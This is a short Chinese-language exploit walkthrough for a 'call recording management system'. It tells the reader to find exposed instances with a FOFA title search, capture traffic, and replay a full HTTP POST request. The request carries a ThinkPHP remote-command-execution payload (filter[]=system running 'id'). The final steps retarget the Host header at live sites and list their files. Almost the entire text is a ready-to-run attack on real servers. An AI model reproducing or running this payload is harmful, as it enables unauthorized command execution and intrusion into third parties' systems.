1.fofa搜索 title="录音管理系统"
2.抓包
3.然后将poc发送到重放器 用以下poc替换掉原来的poc
POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52
s=id&_method=__construct&method=POST&filter[]=system
4.然后将host修改为要检测的网站发送查看,这里我们看到有回显
5.查询当前目录下的文件